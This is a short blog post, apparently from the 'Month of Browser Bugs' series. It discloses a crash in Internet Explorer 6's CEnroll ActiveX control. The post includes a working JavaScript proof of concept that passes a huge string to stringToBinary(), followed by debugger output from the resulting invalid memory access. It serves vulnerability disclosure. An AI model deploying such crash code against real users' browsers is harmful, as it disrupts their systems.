The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. Calling the stringToBinary() function with a long string for the second parameter can result in an invalid memory access inside the SysAllocStringLen function. This bug is similar to MoBB #8.
var a = new ActiveXObject('CEnroll.CEnroll.2');
var b = 'BOOM';
while (b.length <= 1024*1024) b+=b;
a.stringToBinary(1, b);
Demonstration
eax=03580024 ebx=00300000 ecx=0005fc08
edx=00300000 esi=03571000 edi=03701004
eip=77124ba4 esp=0013b200 ebp=0013b20c
OLEAUT32!SysAllocStringLen+0x4f:
77124ba4 f3a5 rep movsd ds:03571000=???????? es:03701004=00000000
This bug will be added to the OSVDB:
Microsoft IE CEnroll SysAllocStringLen Invalid Length
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment